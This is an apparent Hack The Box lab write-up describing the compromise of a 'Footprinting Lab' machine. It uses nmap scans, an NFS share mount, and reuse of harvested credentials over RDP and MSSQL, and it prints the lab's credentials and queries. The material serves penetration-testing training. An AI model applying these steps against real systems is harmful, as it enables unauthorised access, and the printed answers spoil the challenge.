HTB Footprinting Lab (medium) write-up

This write-up details the steps taken to compromise a "Footprinting Lab" machine, a medium-level challenge

1. Nmap Fun: First, a regular nmap scan on 10.129.202.41 showed a bunch of open ports, including RPC, SMB, RDP (that's remote desktop!), and NFS.

2. RPC & NFS Deep Dive: Then, we dug a bit deeper with

    $ sudo nmap 10.129.202.41 -p111 --script rpcinfo # for RPC stuff
    $ sudo nmap 10.129.202.41 --script nfs* -vv # for NFS
   

   Turns out there's an /TechSupport NFS share, but it's pretty locked down – read-only basically.

   

3. Mounting the Share: Even though it was read-only, we mounted that bad boy to our local machine with

    $ mkdir /mnt/nfs 
    $ sudo mount -t nfs 10.129.202.41:/TechSupport /mnt/nfs.
   

4. File Hunting: Once it was mounted, we hopped into /mnt/nfs and used ls -a to see what was there. We found a bunch of ticket*.txt files.

5. Finding the Goods: We looped through those ticket files with

    for f in ticket*.txt; do [ -s "$f" ] && echo "[+] $f" && cat "$f" && echo; done
   

   Bingo! One of them, ticket4238791283782.txt, had an SMTP configuration with the username "alex" and the password "lol123!mD". Sweet!

6. RDP Login: With those new creds (alex and lol123!mD), we tried RDP and it worked!

    xfreerdp3 /u:alex /p:"lol123\!mD" /v:10.129.202.41
   

   

7. Admin Creds on RDP: Inside the RDP session, we found a file at C:/Users/alex/debshare/important.txt. This file had the real jackpot: admin credentials, sa:87NS1@slls93.

8. MSSQL for the Win: We initially tried to log into MSSQL with the sa:87NS1@slls93 credentials, but it wasn't working. After checking a hint from HTB that said "Every windows system has an administrator account", we realized our mistake. We then tried launching MSSQL as an administrator and using 87NS1@slls93 as the password – and it worked!

    USE accounts; 
    GO 
    SELECT * FROM INFORMATION_SCHEMA.TABLES; 
    SELECT * FROM dbo.devsacc WHERE name='HTB';
   

   We got it!